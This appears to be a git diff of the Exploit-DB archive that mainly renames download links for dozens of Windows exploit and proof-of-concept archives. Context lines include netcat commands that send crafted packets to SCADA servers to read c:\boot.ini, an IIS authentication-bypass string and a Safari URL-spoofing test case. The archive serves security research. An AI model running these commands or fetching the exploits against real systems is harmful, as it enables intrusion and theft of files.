https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8799.zip (2009-safemod-windows.zip) diff --git a/platforms/windows/local/8875.txt b/platforms/windows/local/8875.txt index 62421bc6e..a038be4f2 100755 --- a/platforms/windows/local/8875.txt +++ b/platforms/windows/local/8875.txt @@ -31,7 +31,7 @@ Exploit: http://ntinternals.org/ntiadv0806/OAmon_Exp.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-OAmon_Exp.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8875.zip (2009-OAmon_Exp.zip) Advisory: http://www.ntinternals.org/ntiadv0806/ntiadv0806.html diff --git a/platforms/windows/local/9301.txt b/platforms/windows/local/9301.txt index b0eeaf0e6..ba4ba6c5c 100755 --- a/platforms/windows/local/9301.txt +++ b/platforms/windows/local/9301.txt @@ -28,7 +28,7 @@ Exploit: http://www.ntinternals.org/win32k/NtUserConsoleControl_Exp.zip -back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-NtUserConsoleControl_Exp.zip +back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9301.zip (2009-NtUserConsoleControl_Exp.zip) Description: http://www.ntinternals.org/index.html#09_07_30 diff --git a/platforms/windows/local/9579.txt b/platforms/windows/local/9579.txt index f8f084c1b..c8614a3a0 100755 --- a/platforms/windows/local/9579.txt +++ b/platforms/windows/local/9579.txt @@ -13,6 +13,6 @@ # http://www.coromputer.net/CVE-2009-0927_package.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-CVE-2009-0927_package.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9579.zip (2009-CVE-2009-0927_package.zip) # milw0rm.com [2009-09-03] diff --git a/platforms/windows/remote/11173.txt b/platforms/windows/remote/11173.txt index 62a4a99c3..2aab0ba45 100755 --- a/platforms/windows/remote/11173.txt +++ b/platforms/windows/remote/11173.txt @@ -6,4 +6,4 @@ # Tested on: xpsp3 ie6 # Download: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/TrendMicro_web_deployment_activex0day.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11173.zip (TrendMicro_web_deployment_activex0day.zip) \ No newline at end of file diff --git a/platforms/windows/remote/12614.txt b/platforms/windows/remote/12614.txt index 6ec3063ac..aeda58600 100755 --- a/platforms/windows/remote/12614.txt +++ b/platforms/windows/remote/12614.txt @@ -1,5 +1,5 @@ Download: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/safari_parent_close_sintsov.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12614.zip (safari_parent_close_sintsov.zip) Unzip and run START.htm diff --git a/platforms/windows/remote/14179.txt b/platforms/windows/remote/14179.txt index 89b369a6b..9aff00588 100755 --- a/platforms/windows/remote/14179.txt +++ b/platforms/windows/remote/14179.txt @@ -5,4 +5,4 @@ This vulnerability is because of using Alternate Data Stream to open a protected authentication methods can be circumvented. In this technique, we can add a “:$i30:$INDEX_ALLOCATION” to a directory name to bypass the authentication. Download: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/IIS5.1_Authentication_Bypass.pdf \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14179.pdf (IIS5.1_Authentication_Bypass.pdf) \ No newline at end of file diff --git a/platforms/windows/remote/14267.txt b/platforms/windows/remote/14267.txt index 446d47232..a99dbebde 100755 --- a/platforms/windows/remote/14267.txt +++ b/platforms/windows/remote/14267.txt @@ -87,7 +87,7 @@ possible to disable this feature. http://aluigi.org/testz/onlywebs.zip or -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/bfonlywebs.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14267.zip (bfonlywebs.zip) - launch: onlywebs.exe c:\malicious_file.exe - start the server launcher using the following string as sponsor and diff --git a/platforms/windows/remote/14275.txt b/platforms/windows/remote/14275.txt index 8f04288b2..ea9c97132 100755 --- a/platforms/windows/remote/14275.txt +++ b/platforms/windows/remote/14275.txt @@ -8,7 +8,7 @@ This bug utilizes Microsoft Help vuln for RCE. You can test by browsing to http://krash.in/real-exp/exploit.ram -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/rp-0day-08-07-2010.tar +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14275.tar (rp-0day-08-07-2010.tar) --webDEViL diff --git a/platforms/windows/remote/14599.txt b/platforms/windows/remote/14599.txt index a0cae7ba7..09655db29 100755 --- a/platforms/windows/remote/14599.txt +++ b/platforms/windows/remote/14599.txt @@ -1,4 +1,4 @@ Tested on my XPSP3+IE7+/nx=AlwaysOn, should work on Windows 7 with the proper return value. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/Dr_IDE-AoA-JIT.rar \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14599.rar (Dr_IDE-AoA-JIT.rar) \ No newline at end of file diff --git a/platforms/windows/remote/14674.txt b/platforms/windows/remote/14674.txt index 984c8a90a..24fb314ad 100755 --- a/platforms/windows/remote/14674.txt +++ b/platforms/windows/remote/14674.txt @@ -43,4 +43,4 @@ http://blog.metasploit.com/2009/10/smb2-351-packets-from-trampoline.html =========================================================================== Download: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/smb2_exploit_release.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14674.zip (smb2_exploit_release.zip) \ No newline at end of file diff --git a/platforms/windows/remote/14853.py b/platforms/windows/remote/14853.py index 1877097a5..9140dc7d9 100755 --- a/platforms/windows/remote/14853.py +++ b/platforms/windows/remote/14853.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/adobe-acrobat-newclass-invalid-pointer-vulnerability/ -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub1-adobe-newclass.tar.gz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14853.tar.gz (moaub1-adobe-newclass.tar.gz) Title : Adobe Acrobat Reader and Flash Player “newclass” invalid pointer vulnerability Analysis : http://www.abysssec.com diff --git a/platforms/windows/remote/14886.py b/platforms/windows/remote/14886.py index b3ee992cd..577565367 100755 --- a/platforms/windows/remote/14886.py +++ b/platforms/windows/remote/14886.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/movie-maker-remote-code-execution-ms10-016/ - https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/Movie-Maker-Remote-Code-Execution-Exploit.zip + https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14886.zip (Movie-Maker-Remote-Code-Execution-Exploit.zip) Title : Movie Maker Remote Code Execution (MS10-016) Version : moviemk.exe 2.1 (XP SP3) diff --git a/platforms/windows/remote/14895.py b/platforms/windows/remote/14895.py index 657b9f438..1bc0e4e33 100755 --- a/platforms/windows/remote/14895.py +++ b/platforms/windows/remote/14895.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub-5-microsoft-mpeg-layer-3-audio-stack-based-overflow/ - https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-5-exploit.zip + https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14895.zip (moaub-5-exploit.zip) ''' diff --git a/platforms/windows/remote/15056.py b/platforms/windows/remote/15056.py index 274de4d2a..157f95fa3 100755 --- a/platforms/windows/remote/15056.py +++ b/platforms/windows/remote/15056.py @@ -20,7 +20,7 @@ MOAUB Number : MOAUB_20_BA http://www.exploit-db.com/moaub-20-java-cmm-readmabcurvedata-stack-overflow/ -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-20-exploit.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15056.zip (moaub-20-exploit.zip) ''' import sys diff --git a/platforms/windows/remote/15241.txt b/platforms/windows/remote/15241.txt index 2962b96a3..7e859ebd9 100755 --- a/platforms/windows/remote/15241.txt +++ b/platforms/windows/remote/15241.txt @@ -60,5 +60,5 @@ SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS -Code: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/iExploit12-DEP.zip +Code: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15241.zip (iExploit12-DEP.zip) diff --git a/platforms/windows/remote/15296.txt b/platforms/windows/remote/15296.txt index 43695af78..2164c8483 100755 --- a/platforms/windows/remote/15296.txt +++ b/platforms/windows/remote/15296.txt @@ -213,7 +213,7 @@ The sample + exploit are tested on patched windows XP service pack 3. here is exploit + binary analysis link: http://abysssec.com/files/Adobe_Shockwave_Director_rcsL_Chunk_Memory_Corruption.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/Adobe_Shockwave_Director_rcsL_Chunk_Memory_Corruption.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15296.zip PS 1 : this vulnerability is not patched bug released by ZDI http://www.zerodayinitiative.com/advisories/ZDI-10-162/ PS 2 : itís possible to exploit this vulnerability on modern windows like Vista/7 too and itís up to readers Ö diff --git a/platforms/windows/remote/15869.txt b/platforms/windows/remote/15869.txt index 407fa71be..2d2473a6c 100755 --- a/platforms/windows/remote/15869.txt +++ b/platforms/windows/remote/15869.txt @@ -48,4 +48,4 @@ However, here we are. And two of three are unpatched. proof of concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9sg_ca_d2d.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15869.zip (9sg_ca_d2d.zip) diff --git a/platforms/windows/remote/16594.rb b/platforms/windows/remote/16594.rb index 6581789b5..dd383a7ec 100755 --- a/platforms/windows/remote/16594.rb +++ b/platforms/windows/remote/16594.rb @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote [ [ 'CVE', '2010-3653'], [ 'OSVDB', '68803'], - [ 'URL', 'https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/Adobe_Shockwave_Director_rcsL_Chunk_Memory_Corruption.zip' ], + [ 'URL', 'https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15296.zip' ], ], 'DefaultOptions' => { diff --git a/platforms/windows/remote/17022.txt b/platforms/windows/remote/17022.txt index 99517aec3..c8fa95fe3 100755 --- a/platforms/windows/remote/17022.txt +++ b/platforms/windows/remote/17022.txt @@ -6,8 +6,8 @@ http://aluigi.org/adv/factorylink_4-adv.txt http://aluigi.org/adv/factorylink_5-adv.txt http://aluigi.org/adv/factorylink_6-adv.txt -Advisory Archive: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/siemens_factory_link_adv.tar.gz -PoC Archive: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/siemens_factory_link_poc.tar.gz +Advisory Archive: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17022-1.tar.gz (siemens_factory_link_adv.tar.gz) +PoC Archive: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17022-2.tar.gz (siemens_factory_link_poc.tar.gz) ####################################################################### @@ -57,7 +57,7 @@ The Code http://aluigi.org/poc/factorylink_x.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/factorylink_x.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17022-x.zip (factorylink_x.zip) factorylink_x 3 SERVER @@ -84,7 +84,7 @@ The Code http://aluigi.org/poc/factorylink_x.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/factorylink_x.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17022-x.zip (factorylink_x.zip) for downloading c:\boot.ini factorylink_x 4 SERVER @@ -116,7 +116,7 @@ The Code =========== http://aluigi.org/poc/factorylink_3.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/factorylink_3.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17022-3.zip (factorylink_3.zip) nc SERVER 7579 < factorylink_3.dat @@ -143,7 +143,7 @@ The Code =========== http://aluigi.org/poc/factorylink_4.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/factorylink_4.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17022-4.zip (factorylink_4.zip) nc SERVER 7579 < factorylink_4.dat @@ -167,7 +167,7 @@ The Code =========== http://aluigi.org/poc/factorylink_5.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/factorylink_5.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17022-5.zip (factorylink_5.zip) download c:\boot.ini nc SERVER 7579 < factorylink_5.dat @@ -191,7 +191,7 @@ The Code =========== http://aluigi.org/poc/factorylink_x.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/factorylink_x.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17022-x.zip (factorylink_x.zip) factorylink_x 1 SERVER factorylink_x 2 SERVER diff --git a/platforms/windows/remote/17024.txt b/platforms/windows/remote/17024.txt index 1103c0aa4..5928dbd90 100755 --- a/platforms/windows/remote/17024.txt +++ b/platforms/windows/remote/17024.txt @@ -8,8 +8,8 @@ http://aluigi.org/adv/igss_6-adv.txt http://aluigi.org/adv/igss_7-adv.txt http://aluigi.org/adv/igss_8-adv.txt -Advisory Archive: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/igss_adv.tar.gz -PoC Archive: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/igss_poc.tar.gz +Advisory Archive: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17024-adv.tar.gz (igss_adv.tar.gz) +PoC Archive: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17024-poc.tar.gz (igss_poc.tar.gz) ####################################################################### @@ -69,7 +69,7 @@ The Code =========== http://aluigi.org/poc/igss_1.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/igss_1.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17024-1.zip (igss_1.zip) example for downloading c:\boot.ini: nc SERVER 12401 < igss_1a.dat @@ -113,7 +113,7 @@ The Code =========== http://aluigi.org/poc/igss_2.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/igss_2.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17024-2.zip (igss_2.zip) nc SERVER 12401 < igss_2a.dat nc SERVER 12401 < igss_2b.dat @@ -176,7 +176,7 @@ The Code =========== http://aluigi.org/poc/igss_3.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/igss_3.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17024-3.zip (igss_3.zip) nc SERVER 12401 < igss_3.dat @@ -215,7 +215,7 @@ The Code =========== http://aluigi.org/poc/igss_4.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/igss_4.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17024-4.zip (igss_4.zip) Proof-of-concept via "ReadFile": nc SERVER 12401 < igss_4a.dat @@ -265,7 +265,7 @@ The following proof-of-concept exploits the vulnerability from the other vulnerabilities before the reaching of this bugged function: http://aluigi.org/poc/igss_5.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/igss_5.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17024-5.zip (igss_5.zip) nc SERVER 12401 < igss_5a.dat (will add the "old_name" template) nc SERVER 12401 < igss_5b.dat @@ -312,7 +312,7 @@ The Code =========== http://aluigi.org/poc/igss_6.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/igss_6.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17024-6.zip (igss_6.zip) nc SERVER 12401 < igss_6.dat @@ -351,7 +351,7 @@ The Code =========== http://aluigi.org/poc/igss_7.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/igss_7.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17024-7.zip (igss_7.zip) nc SERVER 12401 < igss_7.dat @@ -379,7 +379,7 @@ The Code http://aluigi.org/poc/igss_8.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/igss_8.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17024-8.zip (igss_8.zip) Two examples for executing calc.exe ("calc.exe arg1 arg2 arg3"): nc SERVER 12397 < igss_8a.dat diff --git a/platforms/windows/remote/17104.txt b/platforms/windows/remote/17104.txt index b7f88a955..373bf4f40 100755 --- a/platforms/windows/remote/17104.txt +++ b/platforms/windows/remote/17104.txt @@ -349,4 +349,4 @@ binary info: POC: pocs availiable here: http://retrogod.altervista.org/9sg_realgames_i.html - https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9sg_StubbyUtil.ShellCtl.1.zip + https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17104.zip (9sg_StubbyUtil.ShellCtl.1.zip) diff --git a/platforms/windows/remote/17105.txt b/platforms/windows/remote/17105.txt index 009350de0..262270d4b 100755 --- a/platforms/windows/remote/17105.txt +++ b/platforms/windows/remote/17105.txt @@ -226,4 +226,4 @@ binary info: poc: pocs availiable here: http://retrogod.altervista.org/9sg_realgames_ii.html - https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9sg_StubbyUtil.ProcessMgr.1.zip \ No newline at end of file + https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17105.zip (9sg_StubbyUtil.ProcessMgr.1.zip) \ No newline at end of file diff --git a/platforms/windows/remote/17187.txt b/platforms/windows/remote/17187.txt index 74485e442..0a1fb39af 100755 --- a/platforms/windows/remote/17187.txt +++ b/platforms/windows/remote/17187.txt @@ -19,4 +19,4 @@ Note: In using strings as a buffer for shellcode in action script, it is importa Here you can get our reliable exploit against windows 7 : calc.exe payload -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/CVE-2010-3654_Win7.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17187.zip (CVE-2010-3654_Win7.zip) \ No newline at end of file diff --git a/platforms/windows/remote/17419.zip b/platforms/windows/remote/17419.zip index 1be9037e9..96c46895f 100755 --- a/platforms/windows/remote/17419.zip +++ b/platforms/windows/remote/17419.zip @@ -17,8 +17,8 @@ reliably on Windows7. there is two version of this exploit XP and 7 and both use different method that used in MSF Exploit bounty ! -XP Version: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/nsTreeRange_XP.zip -Win7 Version: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/nsTreeRange_7.zip +XP Version: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17419-1.zip (nsTreeRange_XP.zip) +Win7 Version: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17419-2.zip (nsTreeRange_7.zip) diff --git a/platforms/windows/remote/17517.txt b/platforms/windows/remote/17517.txt index 57a6827a1..ba1bd6786 100755 --- a/platforms/windows/remote/17517.txt +++ b/platforms/windows/remote/17517.txt @@ -13,4 +13,4 @@ Symantec Disclosure link: http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2011&suid=20110526_00 iViZ Disclosure link: goo.gl/1vzdE -Exploit Code: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/SymantecReplay.zip \ No newline at end of file +Exploit Code: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17517.zip (SymantecReplay.zip) \ No newline at end of file diff --git a/platforms/windows/remote/17575.txt b/platforms/windows/remote/17575.txt index f53dc6641..aef27978f 100755 --- a/platforms/windows/remote/17575.txt +++ b/platforms/windows/remote/17575.txt @@ -23,4 +23,4 @@ CVEs listed in APPLE-SA-2011-07-20-1. and follow @abysssec for updates http://www.abysssec.com/files/CVE-2011-0222_WinXP_Exploit.zip - https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/CVE-2011-0222_WinXP_Exploit.zip + https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17575.zip (CVE-2011-0222_WinXP_Exploit.zip) diff --git a/platforms/windows/remote/17977.txt b/platforms/windows/remote/17977.txt index d949e1da4..d96ebf98d 100755 --- a/platforms/windows/remote/17977.txt +++ b/platforms/windows/remote/17977.txt @@ -25,4 +25,4 @@ PORT 8080 ONLY. CHEERS, KINGCOPE -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/DAYTONA_FULL.tar.bz2 +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17977.tar.bz2 (DAYTONA_FULL.tar.bz2) diff --git a/platforms/windows/remote/18016.txt b/platforms/windows/remote/18016.txt index 853ea6919..63c87c10d 100755 --- a/platforms/windows/remote/18016.txt +++ b/platforms/windows/remote/18016.txt @@ -59,4 +59,4 @@ The resulting file will look like this: poc, which overwrites boot.ini: http://retrogod.altervista.org/9sg_autovueiii.zip -Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9sg_autovueiii.zip +Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18016.zip (9sg_autovueiii.zip) diff --git a/platforms/windows/remote/18437.txt b/platforms/windows/remote/18437.txt index 8ed895692..df789ab5c 100755 --- a/platforms/windows/remote/18437.txt +++ b/platforms/windows/remote/18437.txt @@ -5,7 +5,7 @@ # contact : info [at] abysssec.com # http://www.abysssec.com/blog/2012/01/31/exploiting-cve-2011-2140-another-flash-player-vulnerability # -# Full PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/CVE-2011-2140.zip +# Full PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18437.zip (CVE-2011-2140.zip) # import sys diff --git a/platforms/windows/remote/2054.txt b/platforms/windows/remote/2054.txt index 9209621fc..71d64ce41 100755 --- a/platforms/windows/remote/2054.txt +++ b/platforms/windows/remote/2054.txt @@ -1,5 +1,5 @@ MS Windows DHCP Client Broadcast Attack Exploit (MS06-036) -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/07212006-MS06_036_DHCP_Client.tar.gz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2054.tar.gz (07212006-MS06_036_DHCP_Client.tar.gz) # milw0rm.com [2006-07-21] diff --git a/platforms/windows/remote/24017.html b/platforms/windows/remote/24017.html index 33e75da4e..af48d7e41 100755 --- a/platforms/windows/remote/24017.html +++ b/platforms/windows/remote/24017.html @@ -11,7 +11,7 @@ ** Metasploit exploit using NON-ASLR DLL: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms12_037_ie_colspan.rb ** Vupen Blog post: http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php ** Tested on Windows 7 (x86) - IE 8.0.7601.17514 -** Old version of the exploit available at: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24017_old.zip +** Old version of the exploit available at: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24017-old.zip #################################################################### diff --git a/platforms/windows/remote/3022.txt b/platforms/windows/remote/3022.txt index 1fdfb0d44..217ba2628 100755 --- a/platforms/windows/remote/3022.txt +++ b/platforms/windows/remote/3022.txt @@ -2,6 +2,6 @@ # Solar Eclipse # solareclipse at phreedom dot org -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12262006-killbill.tar.gz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3022.tar.gz (12262006-killbill.tar.gz) # milw0rm.com [2004-03-26] diff --git a/platforms/windows/remote/3274.txt b/platforms/windows/remote/3274.txt index e35500055..154be4c8a 100755 --- a/platforms/windows/remote/3274.txt +++ b/platforms/windows/remote/3274.txt @@ -19,6 +19,6 @@ download: http://www.0xdeadbeef.info/exploits/raptor_winudf.tgz -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/02062007-raptor_winudf.tgz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3274.tgz (02062007-raptor_winudf.tgz) # milw0rm.com [2007-02-06] diff --git a/platforms/windows/remote/33071.txt b/platforms/windows/remote/33071.txt index f16f5ca24..062d9e40c 100755 --- a/platforms/windows/remote/33071.txt +++ b/platforms/windows/remote/33071.txt @@ -8,8 +8,7 @@ # More info on: http://funoverip.net/?p=1685 & https://github.com/funoverip/epowner PoC: -v0.1 - https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/ePowner.0.1.tar.gz -v0.2.1- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/epowner-0.2.1.zip +v0.2.1- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33071-2.tar.gz (epowner-0.2.1.zip) ===================================================================================================== INTRODUCTION diff --git a/platforms/windows/remote/34647.txt b/platforms/windows/remote/34647.txt index 82895ddae..b0432723e 100755 --- a/platforms/windows/remote/34647.txt +++ b/platforms/windows/remote/34647.txt @@ -1,4 +1,4 @@ -Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/aa0day.zip +Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/34647.zip (aa0day.zip) The Revenge of the Scammers diff --git a/platforms/windows/remote/3634.txt b/platforms/windows/remote/3634.txt index 08e258229..aface4b96 100755 --- a/platforms/windows/remote/3634.txt +++ b/platforms/windows/remote/3634.txt @@ -21,6 +21,6 @@ Credit: milw0rm,metasploit, SkyLined, http://doctus.net/ invokes calc.exe if successful -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/04012007-Animated_Cursor_Exploit.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3634.zip (04012007-Animated_Cursor_Exploit.zip) # milw0rm.com [2007-04-01] diff --git a/platforms/windows/remote/3635.txt b/platforms/windows/remote/3635.txt index a5d5db4b1..a8af055a6 100755 --- a/platforms/windows/remote/3635.txt +++ b/platforms/windows/remote/3635.txt @@ -22,6 +22,6 @@ after M$ released patch. greets: used SkyLined's idea of exploitation. tnx to him. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/04012007-ani.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3635.zip (04012007-ani.zip) # milw0rm.com [2007-04-01] diff --git a/platforms/windows/remote/3636.txt b/platforms/windows/remote/3636.txt index 353914ec7..927bd1d53 100755 --- a/platforms/windows/remote/3636.txt +++ b/platforms/windows/remote/3636.txt @@ -22,6 +22,6 @@ Credit: milw0rm,metasploit, SkyLined, http://doctus.net/ invokes calc.exe if successful -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/04012007-exp.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3636.zip (04012007-exp.zip) # milw0rm.com [2007-04-01] diff --git a/platforms/windows/remote/3651.txt b/platforms/windows/remote/3651.txt index 21a721d9c..322158a86 100755 --- a/platforms/windows/remote/3651.txt +++ b/platforms/windows/remote/3651.txt @@ -10,6 +10,6 @@ # Microsoft for great coding and Amsterdam (BH07 Europe) party #-------------------------------------------------------------------------------- -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/04032007-ie_ani.tar.gz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3651.tar.gz (04032007-ie_ani.tar.gz) # milw0rm.com [2007-04-03] diff --git a/platforms/windows/remote/37020.html b/platforms/windows/remote/37020.html new file mode 100755 index 000000000..48db367f5 --- /dev/null +++ b/platforms/windows/remote/37020.html @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/52746/info + +Apple Safari for Windows is affected by a URI-spoofing vulnerability. + +An attacker may leverage this issue to spoof the source URI of a site presented to an unsuspecting user. This may lead to a false sense of trust because the user may be presented with a source URI of a trusted site while interacting with the attacker's malicious site. + +Versions prior to Apple Safari 5.1.5 on Windows systems are vulnerable. + + Safari for windows 5.1.5 and prior URL spoof window.open() test case.

Safari for windows 5.1.5 and prior URL pseudo-spoof window.open() test case.

First Click in this link ==> invoke PoC

and Look in result window, the address bar , show The url and if you write any url in the address bar, the browser can't navigate to it. This issue can be used to spoof sites or pishing attacks. Vulnerable Safari for windows 5.1.5 and prior versions, also Safari for IOS is Too vulnerable. \ No newline at end of file diff --git a/platforms/windows/remote/3746.txt b/platforms/windows/remote/3746.txt index 649a2f2d6..2cc7d420e 100755 --- a/platforms/windows/remote/3746.txt +++ b/platforms/windows/remote/3746.txt @@ -52,6 +52,6 @@ also available at http://514.es/Microsoft_Dns_Server_Exploit_v2.1.zip http://www.48bits.com/exploits/dnsxpl.v2.1.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/04172007-dnsxpl.v2.1.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3746.zip (04172007-dnsxpl.v2.1.zip) # milw0rm.com [2007-04-18] diff --git a/platforms/windows/remote/3804.txt b/platforms/windows/remote/3804.txt index d201bb3a3..086f143c0 100755 --- 